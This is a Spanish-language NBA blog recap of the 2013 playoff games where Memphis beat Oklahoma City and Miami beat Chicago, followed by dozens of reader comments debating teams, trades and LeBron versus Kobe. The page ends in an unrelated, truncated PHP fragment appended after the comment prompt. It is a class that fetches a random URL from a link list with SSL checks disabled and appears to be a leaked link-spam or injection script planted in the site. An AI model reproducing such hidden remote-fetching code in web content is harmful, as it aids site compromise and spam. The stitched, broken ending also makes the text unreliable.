La Crónica: Noche histórica para Memphis

16 de May de 2013 por txusma

grizzCon su victoria de ayer, los Memphis Grizzlies alcanzan las finales de conferencia por primera vez en su historia. Éxito de gestión del GM, Chris Wallace, que ha construido un equipo equilibrado, rocoso y que sabe jugar a este deporte. Zach Randolph, prácticamente denostado por la liga antes de su llegada a Memphis, fue un martillo pilón en ataque y se impuso una y otra vez a los interiores de los Thunder; Marc Gasol, cuyos derechos llegaron de relleno en el trade de su hermano, no estuvo fino en ataque pero cerró su zona a la perfección e impidió tiros fáciles; Tayshaun Prince, que llegaba como ex-jugador de baloncesto en el trade que acabó con Gay en Toronto, maniató a Kevin Durant y le forzó a realizar uno de sus peores partidos de playoffs que se le recuerdan al acabar con 5 de 21 en tiros de campo; Mike Conley, el simple amigo que pasaba balones a Greg Oden en la universidad, tampoco tuvo uno de sus mejores días pero repartió juego y defendió con solvencia. Y qué decir de los Tony Allen, Jerryd Bayless, Quincy Pondexter o Keyon Dooling… Juntos forman un auténtico equipo que se encuentra ante una oportunidad única de alcanzar la final de la NBA y, por qué no, de soñar con el anillo.

No obstante, el partido comenzó de cara para los Thunder con un parcial de 0-7 y una ventaja de 5 puntos al final del primer cuarto. En el segundo todo cambió, los Grizzlies cerraron líneas, controlaron el rebote y Randolph empezó su particular exhibición. A la media parte ya se llegó con 12 puntos de ventaja para los de Memphis. El tercer cuarto seguía por los mismos derroteros hasta que una acción desgraciada por parte de Tony Allen rompió la dinámica y volvió a meter a Oklahoma City en el partido. Intentando desestabilizar desde el banquillo un triple de Derek Fisher, Allen dejó caer sin querer su camiseta de entrenamiento sobre el parqué. ¿Resultado? El triple de Fisher se daba por válido y Durant anotaba el tiro libre. Lo que había sido un triple fallado se convertía en una jugada de 4 puntos para los Thunder. A partir de este chute de energía, Oklahoma consiguió llegar al último cuarto con solo 2 puntos de desventaja. En teoría el último cuarto es el territorio de Kevin Durant pero es justo anotar que en los últimos partidos no ha sido así. Ayer no fue una excepción. Memphis se volvió a escapar de 12 puntos a mitad del cuarto y tuvieron que ser Jackson, Ibaka, Collison y Fisher los que, en un último arreón, acercaran a su equipo hasta los 2 puntos. La última pelota, la que podía empatar el partido, fue para Durant pero totalmente descentrado y falto de confianza, falló el lanzamiento (88-84).

bulls

En Miami, los Heat se habían conjurado para no tener que volver a Chicago y estuvieron a punto de no poder cumplir su objetivo a pesar de que a los 5 minutos del inicio del partido ya ganaban 2 a 18. Los 2 primeros tiros de los Bulls no tocaron ni aro y el tercer balón lo perdieron. Todo hacía indicar que el partido sería un paseo para Miami pero el espíritu combativo de los de Thibodeau reapareció y consiguieron darle la vuelta al marcador y llegar al descanso con 6 puntos de ventaja. Las diferencias se ampliaron hasta los 10 puntos en el tercer cuarto gracias un Jimmy Butler pletórico que volvió a jugar los 48 minutos de partido. Se mascaba la tragedia en el AmericanAirlines Arena y más cuando Dwyane Wade se había retirado al final del tercer cuarto para tratarse sus maltrechas rodillas. Volvió al partido cuando habían pasado 3 minutos y medio del último cuarto y Shane Battier ya había reducido la ventaja a los 2 puntos. A partir de ahí exhibición de “Flash”: 3-3 en tiros de campo, 3 rebotes y 1 tapón. Norris Cole también se unió a la fiesta e hizo inútiles los últimos esfuerzos de los Bulls por volver a remontar. Nate Robison y Jimmy Butler fallaron los triples que podrían haber empatado el partido y la mágica historia del equipo herido que se levanta una y otra vez tras cada golpe llegó a su fin (91-94). Los Miami Heat alcanzan las finales de conferencia y los Chicago Bulls vuelven a casa con el orgullo del deber cumplido. Quien hace todo lo que puede no está obligado a más.

PREMIOS

MVP: Pese a que LeBron hizo sus números (23 puntos, 7 rebotes, 8 asistencias), el máximo galardón de la jornada va para Zach Randolph, a quien los Thunder no encontraron la manera de frenar. Sus 28 puntos, 14 rebotes, 2 asistencias y 2 robos condujeron a los Grizzlies a las finales de Conferencia.

Sorpresa: Cuando Tom Thibodeau ha decidido levantarle el castigo, Rip Hamilton ha resultado productivo. El ex Pistons anotó 15 puntos con 6/12 en tiros y los Bulls registraron un +15 durante los 35 minutos que él pasó en cancha.

kdDecepción: Indudablemente, la decepción hoy es la de los Thunder, personificada en Kevin Durant. Tras cargar con todo el peso de su equipo durante la eliminatoria, KD falló en el partido que a la postre le costó la eliminación. Sus aparentemente buenos números (21 puntos, 8 rebotes, 6 asistencias y 2 tapones) reflejan su esfuerzo pero el 5 de 21 en tiros de campo y las 7 pérdidas de balón son inasumibles para estos Thunder sin Westbrook. Según Elias Stats, es la primera vez que un jugador anota menos del 25% de sus tiros (con al menos 5 lanzamientos) y pierde 7 o más balones en un partido en el que su equipo queda eliminado.

Mayor esfuerzo en vano: El de Jimmy Butler, Nate Robinson, Carlos Boozer, Rip Hamilton… los Bulls en conjunto, que no se rindieron ni siquiera cuando encajaron un 4-22 para empezar el partido. No sólo reaccionaron sino que remontaron y llegaron al final de partido con opciones de victoria. Nadie se ha ido este año de vacaciones con la cabeza tan alta como ellos.

Imágenes | AP Photos / Getty Images

Comenta

43 comentarios a esta entrada

  1. Gastón dice:
    #1

    Hola a todos, no escribo, pero lector diario de este genial Blog!

    Que alegria leer los resultados de NBA esta mañana(lo primero que hago cuando abro los ojos). No soporto los equipo con estrellas que no saben jugar en equipo, por lo tanto que Memphis siga adelante me alegra muchismo del todo(como dirian por la Castilla La Mancha).

    Memphis debe ganar el anillo! Seria un ejemplo de como debe funcionar un equipo.

    Saludetes

      Citar

  2. Denise dice:
    #2

    ¿Está Ed Davis lesionado o algo?

    A mi me encantaba este jugador, y Hollins no le da bola.

    Y por cierto, se le ha metido muchos palos a OKC aqui en los ultimos días, pero aun sin Westbrook, todos los partidos los han perdido por 8 o menos puntos de diferencia, hasta el ultimo minuto han estado ahí, es decir, tampoco los Grizzlies los han vapuleado y humillado.

      Citar

  3. Maicas dice:
    #3

    Memphis Grizzlies me esta sorprendiendo gratamente. Estan siendo muy superiores partido tras partido, serie tras serie. A dia de hoy para mi es el maximo aspirante a ganar la Conferencia Oeste.
    Me encantaria ver una final de NBA tremenda entre Miami y Memphis. Un duelo muy interesante y atractivo con dos equipos con jugadores y estilos de juego completamente diferentes.

      Citar

  4. fabas dice:
    #4

    Estoy convencido que los grizzlies van a ganar el campeonato. Impresionante Marc, pero impresionante la temporada de Randolf, a pesar de no tener un físico acorde a muchos jugadores, es impresionante en la pintura.

    Una de las debilidades de los Miami va a ser el juego interior.

    Para mí la final sin dudas: Menphis- Miami, con victoria luchada como siempre por unos grizzlies humildes, trabajadores, pero con muchos recursos. Realizan un baloncesto seguro, sin florituras, pero muy bien posicionados.

    ¡Suerte para el mejor defensor de la NBA!

      Citar

  5. HisRoyalAirness dice:
    #5

    Denise:
    ¿Está Ed Davis lesionado o algo?

    A mi me encantaba este jugador, y Hollins no le da bola.

    Y por cierto, se le ha metido muchos palos a OKC aqui en los ultimos días, pero aun sin Westbrook, todos los partidos los han perdido por 8 o menos puntos de diferencia, hasta el ultimo minuto han estado ahí, es decir, tampoco los Grizzlies los han vapuleado y humillado.

    Humillación no pero vapuleo creo que sí

      Citar

  6. txusma dice:
    #6

    No creo que Ed Davis esté lesionado pero a lo mejor no ha acabado de entrar en la dinámica de juego de los Grizzlies. Es un tío joven que seguro que a partir del próximo año entra en la rotación con la gorra pero ahora no es tiempo de pruebas y dudas.

      Citar

  7. pcerezo dice:
    #7

    Lo que es la vida. El traspaso de Gasol fue en su momento considerado como uno de los mayores robos y fíjate ahora el rendimiento de Marc. A Randolph se le llamaba zampabollos en su etapa en los Knicks y fíjate ahora si no les vendría bien a New York.
    Pase quién pase en la otra eliminatoria no es descabellado ver a los Grizzlies en la final de la NBA, quién nos los iba a decir hace 6 o 7 años. Qué grande es el deporte en Estados Unidos.

      Citar

  8. Denise dice:
    #8

    pcerezo: Lo que es la vida. El traspaso de Gasol fue en su momento considerado como uno de los mayores robos y fíjate ahora el rendimiento de Marc. A Randolph se le llamaba zampabollos en su etapa en los Knicks y fíjate ahora si no les vendría bien a New York.Pase quién pase en la otra eliminatoria no es descabellado ver a los Grizzlies en la final de la NBA, quién nos los iba a decir hace 6 o 7 años. Qué grande es el deporte en Estados Unidos.

    Hombre, Randolph era un zampabollos en los Knicks.
    Y el traspaso de Pau Gasol fue un robo. Despues los Grizzlies han tenido la suerte de que Marc se ha convertido en lo que es, pero en aquel tiempo ni los mas optimistas podrían imaginar que Marc llegara a este nivel. Recordad que Marc era otro zampabollos.

      Citar

  9. Simon dice:
    #9

    Es que sinceramente, se les está poniendo una pinta de campeones de la NBA a Memphis que no pueden con ella… luego llegará Miami y ganará con la chorra… pero con Wade maltrecho,Ray Allen que por mucho que digan ahora no pasa de ser un buen jugador de banquillo ( además este año está tirando regular ) ,un juego interior casi inexistente y viendo lo bien que defienden estos Grizzlies les veo muchas posibilidades. Yo desde que eliminaron a los Nuggets voy con los Ositos.

      Citar

  10. pcerezo dice:
    #10

    Denise: Hombre, Randolph era un zampabollos en los Knicks.Y el traspaso de Pau Gasol fue un robo. Despues los Grizzlies han tenido la suerte de que Marc se ha convertido en lo que es, pero en aquel tiempo ni los mas optimistas podrían imaginar que Marc llegara a este nivel. Recordad que Marc era otro zampabollos.

    Pues a eso mismo me refiero, que lo que es la vida. Con 4 o 5 medio despojos haces un equipo que aspira a final de la NBA, tremendo. Y luego ojo al mérito que tiene este entrenador. No se habla de él pero parte de culpa tendrá en la defensa que hacen estos tipos.

      Citar

  11. MagicJohnson32 dice:
    #11

    Bueno, bueno, no tengamos tanta prisa, que Memphis tiene por delante unas finales de Conferencia probablemente contra San Antonio. Por cómo lo decís, parece que vayan a ser un trámite, jeje.

      Citar

  12. pcerezo dice:
    #12

    MagicJohnson32: Bueno, bueno, no tengamos tanta prisa, que Memphis tiene por delante unas finales de Conferencia probablemente contra San Antonio. Por cómo lo decís, parece que vayan a ser un trámite, jeje.

    Yo no les doy de favorito contra Spurs, solo digo que tampoco van al matadero y que si pasan tampoco sería una supersorpresa viendo a los dos equipos.

      Citar

  13. HisRoyalAirness dice:
    #13

    Simon:
    Es que sinceramente, se les está poniendo una pinta de campeones de la NBA a Memphis que no pueden con ella… luego llegará Miami y ganará con la chorra… pero con Wade maltrecho,RayAllen que por mucho que digan ahora no pasa de ser un buen jugador de banquillo ( además este año está tirando regular ) ,un juego interior casi inexistente y viendo lo bien que defienden estos Grizzlies les veo muchas posibilidades. Yo desde que eliminaron a los Nuggets voy con los Ositos.

    Pues yo dudo que ganen con la chorra, a no ser que unos lleguen descansados de la final de conferencia y otros después de partirse bien la boca.
    Aunque Lebron sea el mejor, que lo es, los ositos han demostrado sobradamente que pueden “controlar” a un jugador así que yo veo como factor clave en un supuesto cruce la recuperación de Wade. No es lo mismo poder hacer triples ayudas frente a Durant, que tenía a Kevin Martin, que contra Flash. Aún con marcaje intensivo, si está a buen nivel físico, Wade puede hacerte 25 puntos por noche con la punta del miembro.

      Citar

  14. Chipi dice:
    #14

    Memphis finalista sí, Memphis finalista no… pero siempre contra Miami. ¿Soy el único que piensa que Indiana es el equipo de la liga con más opciones de eliminar a los Heat?. En la porra puse una final de conferencia Heat 4 – Pacers 2, pero anda que no me gustaría que George, Hibbert y compañía se merendasen a Lebron. Y ya que por el otro cuadro nos vamos a quedar sin Warriors, pues que llegue Memphis, que se lo merece más que nadie.

    Una cosa sí tengo clara, y es que si en Miami quieren repetir título, van a tener que sudarlo muy mucho.

      Citar

  15. sempren dice:
    #15

    Yo tampoco creo que esté lesionado, porque no fue una bajada de minutos repentina, sino que pareció más progresiva, así que supongo que en estos momentos Hollins prefiere “malo” conocido con Arthur (su campaña no está siendo tan buena como la de hace dos años), además de que Marc y Zach están jugando bastantes minutos, ya no rotan tanto como en temporada regular.

    Yo creo que tendremos una final igualada, si llega Memphis pondrá las cosas muy difíciles, y si son los Spurs, significa que están a un nivel muy alto como para haber podido con los Grizzlies.
    Lo que más me preocupaba era que los Heat llegaran descansaditos, pero no han acabado antes las semis que sus posibles rivales, y estoy seguro de que los Pacers serán un hueso muy duro de roer

      Citar

  16. sempren dice:
    #16

    Me refería a Ed Davis, obviamente 😉

      Citar

  17. HisRoyalAirness dice:
    #17

    Yo no dudo de los Pacers pero ya se han enfrentado antes y no han podido con ellos. Hibbert debería dar un paso adelante pero sólo lo hace cada 2 meses y eso no llega.

    Y digo una cosa que considero fundamental para el futuro de la liga: los Thunder necesitan a alguien que anote DENTRO. Veo a continuamente a buenos equipos de temporada regular estrellarse en la misma historia en los playoffs; no puedes vivir del tiro exterior y de las suspensiones, cuanto más te adentras en PO menos vale (a no ser que tengas una potencia de fuego descomunal como cuando estaba el trío Westbrook-KD-Harden). Knicks, Thunder, GSW, todos caen en lo mismo pese a tener actuaciones brillantes pero cuando no entran no hay alternativa.
    Si fuese Presti iría a por Howard o Josh Smith con todo lo que tuviese. Lo de Howard sería tremendo y, si éste fuera listo, lo consideraría muy seriamente.

      Citar

  18. txusma dice:
    #18

    HisRoyalAirness:
    Si fuese Presti iría a por Howard o Josh Smith con todo lo que tuviese. Lo de Howard sería tremendo y, si éste fuera listo, lo consideraría muy seriamente.

    Es decir, desprenderse de Westbrook para traerse a Howard?

      Citar

  19. MagicJohnson32 dice:
    #19

    txusma: Es decir, desprenderse de Westbrook para traerse a Howard?

    Supongo que se refiere a desprenderse de Ibaka y enterrar a Perkins en algún zulo de Afganistán. ¿No?

      Citar

  20. Denise dice:
    #20

    HisRoyalAirness: Si fuese Presti iría a por Howard o Josh Smith con todo lo que tuviese. Lo de Howard sería tremendo y, si éste fuera listo, lo consideraría muy seriamente.

    No creo que esté muy interesado en Howard, cuando los Thunder ya rechazaron el traspaso propuesto por Orlando de Howard por Ibaka+Harden. Y en aquel momento Howard era el puto amo de las zonas y su calidad no se discutía.

      Citar

  21. Denise dice:
    #21

    Denise: No creo que esté muy interesado en Howard, cuando los Thunder ya rechazaron el traspaso propuesto por Orlando de Howard por Ibaka+Harden. Y en aquel momento Howard era el puto amo de las zonas y su calidad no se discutía.

    Creo que no me he expresado bien…
    Si los Thunder rechazaron un trade Howard por Ibaka + Harden cuando Howard estaba en su plenitud, su calidad en pista no se discutía y sus comportamientos fuera no se analizaban, cómo van a quererlo ahora que se hablan barbaridades de él y ha hecho una temporada decepcionante.
    Ademas via sign and trade, lo veo dificil poder alcanzar un acuerdo con Lakers, y creo que no pueden ficharlo como agente libre

      Citar

  22. Esteban dice:
    #22

    bueno bueno txus te has emocionadod e mas con el analisis, es cierto que el grupo de menphis no esta construido de super estrellas, pero hace rato que dejaron de ser sorpresa
    es su tercer año seguido en PO, y en uno de ellos elimianron a los spurs y en segunda ronda cayeron 4-3 con el thunder, asi q la sorpresa no es tanta

    por otra parte, zach es cierto que era denostado antes de llegar a menphis, pero eso paso hace 4 años, de ahi ha sido dos veces all´star, cobra un pastizal y llevo a su equipo 3 años a PO

    marc esta lejos de ser aquel relleno, y es nombrado mejor defensor de la NBA

    bien por menphis pero no los hagamos pasar por una sorpresa que no son, sponretodo si el thunder juega sin westbrook

      Citar

  23. Laker1624 dice:
    #23

    Yo pienso que Indiana le va a poner las cosas muy difíciles a Miami, pero ofensivamente los Pacers no me parecen un gran equipo y creo que los Heat acabaran disputando las finales. De hecho, creo que Miami acabara siendo campeón ya juegue contra los Grizzlies, Spurs o Warriors (cosa que veo poco probable). Tengo la impresión de que Grizzlies pagaría la falta de experiencia en unas posibles finales. Por parte de los Spurs, dudo mucho que puedan llegar a las finales en el estado físico idóneo, y creo que eso les acabaría pasando factura contra Miami. Tambien opino que el rendimiento de Wade a partir de este punto sera crucial, porque creo que los Heat se van a encontrar con grandísimas defensas a partir de ahora, y que serán equipos que se sentirán mas cómodos y fuertes jugando con marcadores bajos.

      Citar

  24. Esteban dice:
    #24

    pcerezo: Pues a eso mismo me refiero, que lo que es la vida. Con 4 o 5 medio despojos haces un equipo que aspira a final de la NBA, tremendo. Y luego ojo al mérito que tiene este entrenador. No se habla de él pero parte de culpa tendrá en la defensa que hacen estos tipos.

    cuales son los 4 o 5 despjosos de los que hablas?

    zach randholph llego con mala fama, pero jugo dos años geniales en menphis y en lugar de ser un despjoso, le ofrecieron un contrato de 80 millones por 4 años, a eso le llamas despojo?

    marc gasol, conley, prince, allen, todos con muy buenos contratos, de despojo nada, al contrario, menphis tuvo que sacarse de encima a rudy gay porque estaban excediente el limite salarial demasiados años consecutivos

    q equuipo que paga impuesto lujos esta armado de despojos?

      Citar

  25. Esteban dice:
    #25

    yo siendo el thunder, cambio a westbrook por howard,

    westbrook al igual que harden, si sale de la sombra de durant, es capaz de ser el maximo anotador de la nba

    mientras que el thunder, juega realmente mal con westbrook en cancha, con la aparicion de reggie jackson y lo que deberia meorar jeremy lamb en el futuro, deberian de tener los puntos de westbrook y conseguir un base armador, como calderon, y la dupla howard/ibaka seria imponente en defensa

      Citar

  26. Lucho dice:
    #26

    His Royal TOTALMENTE de acuerdo con lo del juego interno. Me acuerdo que hace no tantos años, hubo una racha de 9 temporadas seguidas (del 99 inclusive al 07) con Oneal o Duncan en las finales. Vale que sean 2 monstruos, pero tambien dice algo de la importancia de la pintura creo.
    Al respecto de eso, GSW si creo que tiene anotacion en la pintura. Pasa que tuvo mala suerte con la lesion de Lee, no crees? Para el año que viene ya tienen su juego interno

      Citar

  27. sempren dice:
    #27

    Los Pacers y los Grizzlies son equipos muy parecidos, bestias en defensa y les falta algo en ataque. Quizá ahora mismo estén mejor preparados los ositos, pierden en el puesto de alero, pero Marc es más regular que Hibbert y Randolph puede ser más jugador franquicia de lo que está siendo David West (aunque este también tiene cierta capacidad de serlo).

    Es probable que Miami sean los campeones de cualquier forma, pero no lo tendrán nada fácil, serán partidos más parecidos a la serie contra Chicago que partidos abiertos y menos duros físicamente.

      Citar

  28. Laker1624 dice:
    #28

    Repasando el articulo de “los mejores aleros de la historia” que fue publicado en este blog hace algún tiempo, me viene a la cabeza la pregunta de que puesto creéis que ocuparía actualmente Lebron en ese ranking. El articulo creo que fue publicado en 2009 y Lebron ni siquiera aparece entre los diez mejores aleros de la historia (cosa que no discuto). En el caso de que este ranking fuera reeditado de nuevo, pienso que Lebron ocuparía un lugar destacado.

      Citar

  29. pcerezo dice:
    #29

    Esteban: cuales son los 4 o 5 despjosos de los que hablas?zach randholph llego con mala fama, pero jugo dos años geniales en menphis y en lugar de ser un despjoso, le ofrecieron un contrato de 80 millones por 4 años, a eso le llamas despojo?marc gasol, conley, prince, allen, todos con muy buenos contratos, de despojo nada, al contrario, menphis tuvo que sacarse de encima a rudy gay porque estaban excediente el limite salarial demasiados años consecutivosq equuipo que paga impuesto lujos esta armado de despojos?

    Pero todo eso fue a posteriori. Cuando Zach Randolph por fin quiso ser un All Star y cuando Marc Gasol se convirtio en una estrella. Dabas tú algún euro por Randolph en Memphis o que Marc iba a hacer tan buena carrera como su hermano? o que Pondexter, Conley y el resto iban a hacer equipo? y Toni Allen? Yo la verdad hace tres o cuatro años no daba un duro por Memphis. O alguien pensaba que Lionel Hollins iba a ser tan buen entrenador? quién pensaba que para el equipo iba a ser mejor Prince que Rudy Gay? Pondexter, quién coño es este tío? Dooling!!!! es el base reserva. Pero con dos cojones, con eso han hecho un equipo defensivo que ríete tú de los ninjas de Fratello. Van a 90 puntos y a sufrir, tanto ellos como el rival.

    Mérito 100%.

      Citar

  30. GreenPride dice:
    #30

    Elimintarias acabadas y primeros finalistas de conferencia.
    Se esperaba lo de Miami ante Chicago aunque no la forma de nuevo estupenda en la que los Bulls han caido… y menos tras un 22-4 de inicio de partido. Los de Chicago lejos de desanimarse y venirse definitivamente abajo se pusieron el mono e hicieron sudar a LeBron y sus muchachos hasta el último segundo con 2 triples para empatar el partido. Es más llevaron la batuta hasta el último cuarto donde la defensa de Miami subió un pistón y empezaron a entrar los triples sobre todo de Battier. Luego ya con el partido igualado una aparición de Wade sirvió para tumbar definitivamente a los Bulls. Ese es el Wade que necesitarán los Heat a partir de ahora si quieren cumplir pronósticos y asaltar de nuevo el anillo. Por los Bulls, sólo felicitarles una vez más. Han luchado contra todas las adversidades posibles esta temporada, con medio equipo lesionado han mandado de vacaciones en campo contrario a los millonarios Nets y han echo luchar y sudar cada uno de los partidos a los Heat. Cayeron con honor y si vuelven el año que viene con Rose y Deng sanos más algún traspaso pueden aspirar a todo.
    En el Oeste pasó lo que se veía venir. Un Durant absolutamente quemado no pudo llevar a sus Thunder. Sus porcentajes han ido disminuyendo a medida que avanzaba la serie y Memphis se daba cuenta de que mandando a todos a cubrirlo, el resto de equipo no tendrían poder de decisión. Veo injusto el comentario de que fueron Collison, Ibaka o Fisher los que producen el último acercamiento ya que la gran mayoría de sus canastas en el último cuarto son tras atraer Durant a varios defensores y soltar apropiadamente el balón. La lesión de Westbrook ahora servirá de excusa casi seguro en Oklahoma para tapar la eliminación antes de lo esperado pero no debería tapar los ojos a sus dirigentes de un equipo que ha quedado demostrado que necesita algo más si quiere ir a por el anillo. Tiene la base con Westbrook-Durant-Ibaka pero está claro que Martin no suple a Harden y que Perkins es un pozo negro que se lleva el dinero que debería ser para un jugador que de verdad ayudara a Durant y Westbrook en ataque. Muy bien Reggie Jackson que ha dado un paso al frente y se plantea como un jugador importante de futuro pero los Thunder necesitan replantearse el equipo si no quieren que Durant se empiece a plantear su futuro.

      Citar

  31. GreenPride dice:
    #31

    Sigo…
    Por los Grizzlies grandes series de sus interiores que han dominado totalmente el juego aunque en este último partido Marc no estuvo tan afortunado cara al aro. En defensa son un bloque sólido que se ha merendado a los Thunder. Ahora les espera un test de verdad para su defensa ya que tanto Spurs como Warriors son equipos con más vías de anotación y jugadores más capaces de anotar. Ahí se verá si su gran talón de aquiles que sigue siendo la anotación no les pasa factura.
    De cara adelante estoy de acuerdo en que los Pacers pueden hacer sudar a los Heat aunque creo que no les ganan una serie a 7 partidos. Les falta algo más de potencial ofensivo así como una referencia para poder golpear en los momentos decisivos. No obstante si Wade sigue al mal nivel físico mostrado pondrán las cosas muy difíciles a los Heat. Me olvido de los Knicks a posta ya que no les veo ganando 3 partidos seguidos a los Pacers ni de broma en su estado actual.
    En el Oeste creo que Spurs prevalecera finalmente sobre los Warriors aunque ojalá les cueste hasta el final y veo unas finales de conferencia preciosas contra Grizzlies. Creo que Spurs puede llegar a las Finales este año pero no tengo claro el signo de esta eliminatoria.
    En las Finales veo favoritos a los Heat. Si llegan los Grizzlies me parece que tienen estructura para hacerles daño a los Heat pero ya vimos el año pasado con Thunder que la primera visita a unas finales no es fácil de digerir. Por si son los Spurs creo que están menos preparados como equipo para hacer frente a los Heat aunque con su experiencia, su bloque y con Pop en el banco no les doy por vencidos antes de tiempo.

      Citar

  32. HisRoyalAirness dice:
    #32

    MagicJohnson32: Supongo que se refiere a desprenderse de Ibaka y enterrar a Perkins en algún zulo de Afganistán. ¿No?

    Supones muy bien.

    Y yo creo que si Miami es favorito es porque las pinturas son un solar absoluto, como bien apuntaban por ahí; Duncan-O´Neal siempre estaban en las finales (y digo más, Garnett-Nowitzki-Bynum/Gasol/Odom).
    Miami el año pasado sudó tinta para deshacerse de el único equipo con un juego interior relativamente serio y grande que se les puso delante (Pacers) y ganaron por anotación y porque los de Indiana tienen muuuuy poco talento.
    Noah antes no era el de ahora y aún así no lo considero un tipo que pueda anotar solo. Creo que se le están poniendo las cosas demasiado fáciles a los Heat. Puto Bynum

      Citar

  33. Simon dice:
    #33

    Hombre yo a los Pacers los veo muy capaces de hacer sufrif a Miami e incluso estoy convencido de q los van a llevar al 7 partido puesto q Indian en casa es muy complicado. pero aunque parecen diseñados para frenar al Heat no los veo ganandoles la eliminatoria. hacerles sufrir y sudar la gota gorda sí… ganarles.no creo.

      Citar

  34. Purple Pride dice:
    #34

    GreenPride:
    Sigo…
    Por los Grizzlies grandes series de sus interiores que han dominado totalmente el juego aunque en este último partido Marc no estuvo tan afortunado cara al aro. En defensa son un bloque sólido que se ha merendado a los Thunder. Ahora les espera un test de verdad para su defensa ya que tanto Spurs como Warriors son equipos con más vías de anotación y jugadores más capaces de anotar. Ahí se verá si su gran talón de aquiles que sigue siendo la anotación no les pasa factura.
    De cara adelante estoy de acuerdo en que los Pacers pueden hacer sudar a los Heat aunque creo que no les ganan una serie a 7 partidos. Les falta algo más de potencial ofensivo así como una referencia para poder golpear en los momentos decisivos. No obstante si Wade sigue al mal nivel físico mostrado pondrán las cosas muy difíciles a los Heat. Me olvido de los Knicks a posta ya que no les veo ganando 3 partidos seguidos a los Pacers ni de broma en su estado actual.
    En el Oeste creo que Spurs prevalecera finalmente sobre los Warriors aunque ojalá les cueste hasta el final y veo unas finales de conferencia preciosas contra Grizzlies. Creo que Spurs puede llegar a las Finales este año pero no tengo claro el signo de esta eliminatoria.
    En las Finales veo favoritos a los Heat. Si llegan los Grizzlies me parece que tienen estructura para hacerles daño a los Heat pero ya vimos el año pasado con Thunder que la primera visita a unas finales no es fácil de digerir. Por si son los Spurs creo que están menos preparados como equipo para hacer frente a los Heat aunque con su experiencia, su bloque y con Pop en el banco no les doy por vencidos antes de tiempo.

    Totalmente de acuerdo contigo amigo GreenPride , aunque añadiría que incluso San Antonio con Manu , Pops,Parker y Duncan , no sería oposición para Miami. Es un equipo tremendamente físico y los Spurs no aguantarían el rtimo.

      Citar

  35. Esteban dice:
    #35

    Sobre los mejoresd aleros de la histoia creo q ya no quedan dudas q lebronsera el mejor de todos los tiempos

    Si logra dos titulos mas al menos y dos mvp mas de finales, lo q es muy probable, estara en un top 5 de los mejores jugadores de la historia de la liga, jordan, magis, wilt, karem y lebron

    Si termina su carrera con 3 titulos, 3 mvp de finales, 5 mvp de temporada regular y a este ritmo 4to ( 5to .como maximo anotador de la liga, su lugar es entre los grandes enserio

      Citar

  36. Esteban dice:
    #36

    Sobre menphis fuieron sorpresivos hace dos años, a esta altura ni marc ni zach, ni conley ni allen son sopresa

      Citar

  37. Lucho dice:
    #37

    Hasta ahora, yo considero a Kobe muy superior a LeBron. Es probable que LeBron lo supere en el futuro, pero hay que esperar, creo yo

      Citar

  38. nba dice:
    #38

    El merito de Hollins es, sacar lo mejor de cada jugador, y adaptar el esquema a los jugadores de los que dispone.
    No demos por enterrados a los Spurs todavía que , en el caso de que lleguen a final de conferencia no va a ser tan sencillo para Memphis defender un perimetro como el de Spurs y con alguien en el banquillo como Popovich que se las sabe todas…

      Citar

  39. rumbero dice:
    #39

    Que animadito esto hoy. Yo iba a comentar algo pero con lo bien que explica las cosas GreenPride no vale pena. Crack!

    Eso si, estamos metiendo ya a los Spurs en la final de conferencia (yo el primero) pero espero que hoy empapen a Curry en crack para que ni sienta el tobillo y haya fiesta grande en el Oracle. Se merecen un 7o estos Warriors

      Citar

  40. Esteban dice:
    #40

    Lucho:
    Hasta ahora, yo considero a Kobe muy superior a LeBron. Es probable que LeBron lo supere en el futuro,pero hay que esperar, creo yo

    al dia de hoy es cierto, pero da la sensacion que la carrera de kobe llega a su fin, hace 3 años que no supera segunda ronda de PO, y las chances de que sea MVP de la regular, campeon de la nba o mvp de finales son muy remotas

    lebron ya tiene 4 mvp de la temporada regular, ha llegado a 3 finales, es campoen y mvp de finales
    si nada se tuerce mucho, este año tendra su segundo anillo y su segun do mvp de finales
    , creo que la prox temporada sera mvp de la regular, de als finales y tendra otro titulo mvp

    si somos excepticos con su futuro rendimiento, imaginemos que termina ahi su reinado no extendiendolo mas, no logranda nunca mas nada, se quedaria con

    5 finales jugadas (4 de ellas consecutivas y 3 titulos consecutivos, 3 mvp de finales, 5 mvp de temp regular, y estaria entre los 5 maximos anotadores de la nba, sumandole que seria uno de los jugadores con mas tirples dobles de la historia
    esto pensando que solo le quedan 2 años mas de nivek de elite, y pensando que de los 29 en adelante nunca mas gane nada

    creo que no hay dudas

    ahora si este año se lesiona y nunca mas vuelve a ganar nada, seguro que kobe sera superior, pero no parece que fueran a terminar asi las cosas

      Citar

  41. Futurman dice:
    #41

    Es injusto comparar a un jugador total con un escolta… digo yo que lo razonable sería una clasificación por posiciones, como ya hay en la página o una por épocas, “mejor jugador del lustro” o similar.

      Citar

  42. Lucho dice:
    #42

    No pienso discutir en lo mas minimo a LeBron terrible jugador. por lejos, el mejor hoy x hoy. Pero por lejos
    Digo qe se subestima mucho a Kobe. Me parece irrisorio que tenga un solo MVP. Nash por ejemplo (fantastico jugador) tiene 2

      Citar

  43. Lucho dice:
    #43

    desde que se retiro jordan el mejor fue kobe. solo.lo.puede discutir duncan creo. LeBron tmb, pero mas adelante
    Es mi opinion, muy personal quizas

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>